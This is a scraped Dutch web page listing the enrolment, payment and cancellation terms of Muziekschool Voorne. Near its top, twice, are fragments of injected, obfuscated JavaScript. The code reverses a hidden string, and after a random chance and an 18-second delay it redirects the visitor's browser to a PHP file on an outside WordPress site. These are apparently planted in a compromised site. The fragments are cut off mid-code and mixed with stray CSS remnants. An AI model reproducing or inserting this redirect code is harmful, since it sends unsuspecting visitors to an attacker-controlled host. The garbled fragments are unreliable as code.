Inschrijfvoorwaarden

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_1500325610820{margin-top: -60px !important;margin-bottom: 0px !important;}”]

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_1598347631618{margin-bottom: 50px !important;}”]

Inschrijfvoorwaarden

Inschrijf- en betalingsvoorwaarden

 • Voor ieder cursusjaar dient u zich opnieuw in te schrijven.
 • Bij inschrijving van een cursus verbindt u zich voor de gehele cursus.
 • Elke nieuwe leerling kan na de eerste vier weken instrumentale of vocale lessen (JAAR) de les schriftelijk beëindigen. Er worden dan vier lessen in rekening gebracht.
 • Toelating tot de cursus geschiedt in volgorde van aanmelding.
 • De vermelde cursussen gaan alleen door bij voldoende deelname.
 • Bij ziekte/onbeschikbaarheid van onze docent zullen de lessen ingehaald worden.
 • Indien de leerling zich afmeldt voor de les zal deze NIET worden ingehaald.
 • Bij inschrijving ontvangt u een bevestiging van de docent.
 • De docenten stellen een rooster samen en nemen contact met u op om een lestijd af te spreken.
 • Overschrijving van de ene naar de andere cursus kan uitsluitend in overleg met de docent.
 • De strippenkaart is één seizoen geldig. Afgesproken lessen kunnen tot maximaal 24 uur van tevoren afgezegd worden. Bij latere afmelding wordt deze les niet ingehaald.

Bij te late betaling geldt:

 • Extra administratiekosten ad € 7,50.
 • Blijft betaling alsnog achterwege, dan wordt het innen van het lesgeld uit handen gegeven.

Onder te late betaling wordt verstaan:

 • Indien het openstaande lesbedrag niet binnen de overeengekomen termijn wordt betaald. 

Betaling cursusgeld:

 • Betaling moet verwerkt zijn voor de eerste les van de maand 
 • Korte Basiscursussen via een éénmalige overmaking
 • Jaarlessen in 1, 3 of 10 termijnen d.m.v. een directe overmaking van het lesgeld aan de docent.Dit geldt alleen voor de JAAR lessen van 19/30 of 38/30.
 • De cursus 13/30 kan in 1 of 3 termijnen geïncasseerd worden. Het is mogelijk deze cursus weer te verlengen met 13 lessen.

Betaling bij latere inschrijving

 • Bij latere inschrijving wordt het te betalen cursusgeld berekend naar rato van de nog te volgen lessen. Dit geldt ook voor de huurprijs van een gehuurd instrument van Muziekschool Voorne.

Beëindiging cursusdeelname

 • Bij tussentijdse opzegging is restitutie van lesgeld niet mogelijk.
 • Ter beoordeling van de docent is in uitzonderlijke gevallen annulering met restitutie van het lesgeld mogelijk (bij verhuizing of langdurige ziekte).
 • Verzoek tot annulering dient schriftelijk aan de docent te worden gericht.

Muziekschool Voorne en de docenten  behouden zich het recht voor af te wijken van de aangegeven lesdagen en plaatsen, wanneer dat om organisatorische redenen noodzakelijk is. Als dat gebeurt, zijn de voorwaarden pas weer van toepassing als de cursist heeft bevestigd aan de gewijzigde cursusopzet deel te nemen.

Top